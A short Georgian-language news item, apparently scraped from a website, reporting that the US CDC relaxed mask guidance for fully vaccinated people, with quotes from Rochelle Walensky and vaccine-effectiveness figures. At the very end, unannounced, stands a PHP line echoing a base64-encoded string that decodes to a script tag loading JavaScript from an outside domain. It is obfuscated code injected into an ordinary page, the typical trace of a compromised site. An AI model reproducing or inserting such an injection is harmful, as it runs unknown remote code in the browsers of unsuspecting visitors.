celsiusi
ავერსი შნაიდერი
ორივე დოზით აცრილ ადამიანებს შეეძლებათ ღია და დახურულ სივრცეებში პირბადეების გარეშე იარონ. ამის შესახებ CNN-ის ცნობით, ამერიკის დაავადებათა კონტროლისა და პრევენციის ცენტრში (CDC) განაცხადეს და კოვიდ-გაიდლაინი განაახლეს.
 
„თუ სრულად ხართ აცრილი, შეგიძლიათ დაიწყოთ იმ ყველაფრის კეთება, რისი კეთების შეჩერებაც პანდემიის გამო მოგიწიათ“, - განაცხადა CDC-ის დირექტორმა როშელ ვალენსკიმ.
 
მისივე თქმით, აღნიშნული გადაწყვეტილება სამეცნიერო კვლევებზე დაყრდნობით მიიღეს, რომლებმაც აჩვენა რომ ვაქცინა მუშაობს.
 
მაგალითად, ამერიკის სამედიცინო ასოციაციის ჟურნალში გამოქვეყნებული ისრაელის კვლევის მიხედვით, ვაქცინამ სიმპტომატური კოვიდ-ინფექციის წინააღმდეგ 97%-იანი ეფექტიანობა აჩვენა, ხოლო ასიმპტომატური შემთხვევების წინააღმდეგ - 86%-იანი.
 
ცნობისთვის, ვალენსკის თქმით, პირბადის ტარების მოთხოვნა მოგზაურობის დროს კვლავ ძალაში იქნება, სამოგზაურო გაიდლაინები კი მაშინვე განახლდება, როგორც კი უფრო მეტი სამეცნიერო დაკვირვება გახდება ხელმისაწვდომი.
1080
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");